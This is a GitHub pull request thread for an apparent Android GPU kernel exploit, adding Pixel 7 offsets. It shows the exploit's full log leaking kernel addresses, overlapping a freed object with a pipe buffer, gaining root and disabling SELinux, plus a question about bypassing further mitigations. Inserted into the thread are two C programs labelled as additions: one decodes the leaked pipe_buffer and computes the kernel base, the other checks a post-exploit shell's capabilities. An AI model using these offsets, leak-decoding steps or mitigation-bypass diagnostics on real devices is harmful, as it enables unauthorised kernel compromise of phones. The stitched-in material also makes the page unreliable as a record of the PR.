
Add Pixel 7 config. #2

Merged (1 commit), Mar 15, 2024

Conversation

@m4b4 commented Mar 14, 2024

I just confirmed that the offsets for the Pixel 7 Pro SPL Nov-23 match with the offsets on my Pixel 7 (panther:14/UP1A.231105.003/11010452).

panther:/ $ /data/local/tmp/gpu_exploit
[+] Target device: 'google/panther/panther:14/UP1A.231105.003/11010452:user/release-keys' 0xd10203ffd503233f 0xa9027bfdf800865e
[+] Got the kcpu_id (0) kernel address = 0xffffff8927434000  from context (0x0)
[+] Got the kcpu_id (255) kernel address = 0xffffff8030358000  from context (0xff)
[+] Found corrupted pipe with size 0xfff
[+] SUCCESS! we have a fake pipe_buffer (0)!
10 40 43 27 89 FF FF FF  10 40 43 27 89 FF FF FF  | .@C'.....@C'....
00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  | ................
00 10 74 13 C0 FF FF FF  00 00 00 00 00 00 00 00  | ..t.............
00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  | ................
[+] Freeing kcpu_id = 0 (0xffffff8927434000)
[+] Allocating 61 pipes with 256 slots
[+] Successfully overlapped the kcpuqueue object with a pipe buffer
00 13 A0 00 FF FF FF FF  00 00 00 00 30 00 00 00  | ............0...
28 CD 57 06 E9 FF FF FF  10 00 00 00 00 00 00 00  | (.W.............
00 00 00 00 00 00 00 00                           | ........
[+] pipe_buffer {.page = 0xffffffff00a01300, .offset = 0x0, .len = 0x30, ops = 0xffffffe90657cd28}
[+] kernel base = 0xffffffe904210000, kthreadd_task = 0xffffff8003595c80 selinux_state = 0xffffffe907395970
[+] Found our own task struct 0xffffff8848a05c80
[+] Successfully got root: getuid() = 0 getgid() = 0
[+] Successfully disabled SELinux
[+] Cleanup  ... OK
panther:/ # whoami
root
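The 40 bytes dumped after "Successfully overlapped the kcpuqueue object with a pipe buffer" are a raw struct pipe_buffer, which the exploit then prints as page/offset/len/ops. As an added example (not code from the exploit or from this PR), here is a decoder for that arm64 layout run over the bytes exactly as logged, plus a plausibility check on the leaked fields. The ops-to-kernel-base delta 0x236cd28 is simply 0xffffffe90657cd28 minus 0xffffffe904210000 from the log; that the base is derived from the ops pointer this way is an assumption made here, and the delta is specific to this build (UP1A.231105.003).

```c
/* Added example: decode the struct pipe_buffer bytes dumped in the log above.
 * Not code from the exploit or the PR. Layout is the arm64 Linux struct
 * pipe_buffer: page, offset, len, ops, flags (+4 bytes padding), private = 40 bytes. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <inttypes.h>

struct pipe_buffer_view {
    uint64_t page;    /* struct page *                        */
    uint32_t offset;  /* unsigned int                         */
    uint32_t len;     /* unsigned int                         */
    uint64_t ops;     /* const struct pipe_buf_operations *   */
    uint32_t flags;   /* unsigned int, then 4 bytes of padding */
    uint64_t priv;    /* unsigned long private                */
};

#define PIPE_BUF_FLAG_CAN_MERGE 0x10   /* kernel's own flag value */
#define PAGE_SIZE_4K            4096

/* Bytes exactly as printed in the log after the kcpuqueue/pipe overlap. */
static const uint8_t LOG_DUMP[40] = {
    0x00,0x13,0xA0,0x00,0xFF,0xFF,0xFF,0xFF, 0x00,0x00,0x00,0x00,0x30,0x00,0x00,0x00,
    0x28,0xCD,0x57,0x06,0xE9,0xFF,0xFF,0xFF, 0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
};

/* Assumption: kernel base = ops - delta. The delta is computed from the two
 * addresses in the log (0xffffffe90657cd28 - 0xffffffe904210000) and only
 * holds for this build. */
#define OPS_TO_KBASE_DELTA 0x236cd28ULL

static uint64_t le64(const uint8_t *p)
{
    uint64_t v = 0;
    for (int i = 7; i >= 0; i--)
        v = (v << 8) | p[i];
    return v;
}

static uint32_t le32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Decode one struct pipe_buffer from a little-endian byte dump. Returns -1
 * when fewer than 40 bytes are available. */
int decode_pipe_buffer(const uint8_t *buf, size_t n, struct pipe_buffer_view *out)
{
    if (n < 40)
        return -1;
    out->page   = le64(buf);
    out->offset = le32(buf + 8);
    out->len    = le32(buf + 12);
    out->ops    = le64(buf + 16);
    out->flags  = le32(buf + 24);
    out->priv   = le64(buf + 32);
    return 0;
}

uint64_t kernel_base_from_ops(uint64_t ops)
{
    return ops - OPS_TO_KBASE_DELTA;
}

/* Heuristic sanity check before trusting the leak: ops must look like a
 * kernel pointer and offset/len must fit inside one page. */
int is_plausible_leak(const struct pipe_buffer_view *v)
{
    return (v->ops >> 56) == 0xff &&
           v->len <= PAGE_SIZE_4K &&
           (uint64_t)v->offset + v->len <= PAGE_SIZE_4K;
}

int main(void)
{
    struct pipe_buffer_view v;
    if (decode_pipe_buffer(LOG_DUMP, sizeof LOG_DUMP, &v) != 0)
        return 1;
    printf("[+] pipe_buffer {.page = 0x%" PRIx64 ", .offset = 0x%x, .len = 0x%x, ops = 0x%" PRIx64 ", flags = 0x%x}\n",
           v.page, v.offset, v.len, v.ops, v.flags);
    printf("[+] plausible leak: %s\n", is_plausible_leak(&v) ? "yes" : "no");
    printf("[+] kernel base (assumed ops - 0x%llx) = 0x%" PRIx64 "\n",
           (unsigned long long)OPS_TO_KBASE_DELTA, kernel_base_from_ops(v.ops));
    return 0;
}
```

The decoded flags field (0x10) is PIPE_BUF_FLAG_CAN_MERGE, which is what an ordinary anonymous pipe buffer carries, so the dump is consistent with a genuine pipe_buffer sitting where the kcpuqueue object used to be.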

@0x36 merged commit 3457395 into 0x36:main Mar 15, 2024

@0x36 (Owner) commented Mar 15, 2024

Thanks!

@marcelbthk (Contributor) commented Apr 12, 2024

@0x36 It was only later that I realized SELinux is seemingly not fully disabled for me:

panther:/ # whoami
root
panther:/data/local/tmp # ls
ls: .: Permission denied
1|panther:/data/local/tmp # getenforce
Permissive

Off the top of your head, can you think of additional security mitigations that might need to be bypassed? I'm currently investigating this but without any success. I verified the uid is set to 0 and also the enforcing flag in selinux_state is zeroed out.
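One check worth making in a session like the one above, as an added example that is not code from the exploit or this PR: with SELinux permissive (denials are only logged), the checks that can still return EACCES on a directory are the DAC ones, and the kernel's DAC override in generic_permission() is decided by the effective capability bits (CAP_DAC_OVERRIDE, CAP_DAC_READ_SEARCH), not by uid 0 on its own. The parser below pulls Uid/Gid/CapEff/NoNewPrivs/Seccomp out of /proc/self/status so a post-exploit shell can see what it actually holds. The two status texts are constructed samples, not captures from the device.

```c
/* Added example (not code from the exploit or this PR): parse the credential
 * lines of /proc/self/status and report whether the effective capability set
 * can bypass DAC on a directory. */
#include <stdio.h>
#include <string.h>
#include <stdint.h>
#include <inttypes.h>

#define CAP_DAC_OVERRIDE    1   /* bypass file read/write/execute permission checks */
#define CAP_DAC_READ_SEARCH 2   /* bypass file read and directory search checks */

struct cred_view {
    long uid[4];        /* real, effective, saved set, filesystem */
    long gid[4];
    uint64_t cap_eff;   /* CapEff bitmask */
    int no_new_privs;
    int seccomp;        /* 0 = disabled, 1 = strict, 2 = filter */
};

/* Constructed sample: uid/gid patched to 0 but an empty effective cap set. */
static const char SAMPLE_UID0_NO_CAPS[] =
    "Name:\tsh\n"
    "Uid:\t0\t0\t0\t0\n"
    "Gid:\t0\t0\t0\t0\n"
    "CapInh:\t0000000000000000\n"
    "CapPrm:\t0000000000000000\n"
    "CapEff:\t0000000000000000\n"
    "CapBnd:\t000001ffffffffff\n"
    "NoNewPrivs:\t0\n"
    "Seccomp:\t2\n"
    "Seccomp_filters:\t1\n";

/* Constructed sample: what a full init-style root looks like. */
static const char SAMPLE_FULL_ROOT[] =
    "Name:\tsh\n"
    "Uid:\t0\t0\t0\t0\n"
    "Gid:\t0\t0\t0\t0\n"
    "CapEff:\t000001ffffffffff\n"
    "NoNewPrivs:\t0\n"
    "Seccomp:\t0\n";

/* Parse /proc/self/status text. Returns 0 once Uid, Gid and CapEff were all seen. */
int parse_status(const char *text, struct cred_view *out)
{
    int seen = 0;
    memset(out, 0, sizeof *out);
    for (const char *p = text; *p; ) {
        const char *nl = strchr(p, '\n');
        size_t len = nl ? (size_t)(nl - p) : strlen(p);
        char line[256];
        if (len >= sizeof line)
            len = sizeof line - 1;
        memcpy(line, p, len);
        line[len] = '\0';
        /* A space in the format skips the tabs that /proc uses as separators. */
        if (sscanf(line, "Uid: %ld %ld %ld %ld", &out->uid[0], &out->uid[1], &out->uid[2], &out->uid[3]) == 4)
            seen |= 1;
        else if (sscanf(line, "Gid: %ld %ld %ld %ld", &out->gid[0], &out->gid[1], &out->gid[2], &out->gid[3]) == 4)
            seen |= 2;
        else if (sscanf(line, "CapEff: %" SCNx64, &out->cap_eff) == 1)
            seen |= 4;
        else if (sscanf(line, "NoNewPrivs: %d", &out->no_new_privs) == 1)
            ;
        else
            sscanf(line, "Seccomp: %d", &out->seccomp);   /* "Seccomp_filters:" does not match */
        if (!nl)
            break;
        p = nl + 1;
    }
    return seen == 7 ? 0 : -1;
}

int has_cap(uint64_t cap_eff, int cap)
{
    return (int)((cap_eff >> cap) & 1);
}

/* True when the DAC check on a directory we do not own can be overridden. */
int can_read_any_dir(const struct cred_view *c)
{
    return has_cap(c->cap_eff, CAP_DAC_OVERRIDE) || has_cap(c->cap_eff, CAP_DAC_READ_SEARCH);
}

static void report(const char *label, const struct cred_view *c)
{
    printf("%s: euid=%ld egid=%ld CapEff=%016" PRIx64 " NoNewPrivs=%d Seccomp=%d dac_override=%s\n",
           label, c->uid[1], c->gid[1], c->cap_eff, c->no_new_privs, c->seccomp,
           can_read_any_dir(c) ? "yes" : "no");
}

int main(void)
{
    struct cred_view c;
    char buf[8192];
    FILE *f = fopen("/proc/self/status", "r");
    if (f) {   /* live process, when run on a Linux host */
        size_t n = fread(buf, 1, sizeof buf - 1, f);
        buf[n] = '\0';
        fclose(f);
        if (parse_status(buf, &c) == 0)
            report("self", &c);
    }
    if (parse_status(SAMPLE_UID0_NO_CAPS, &c) == 0) report("sample uid0/no caps", &c);
    if (parse_status(SAMPLE_FULL_ROOT, &c) == 0)   report("sample full root", &c);
    return 0;
}
```

Run it from the shell the exploit drops you into; if CapEff prints as zeros while euid is 0, the cred struct carries the identity but none of the capability bits that the DAC path actually consults.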
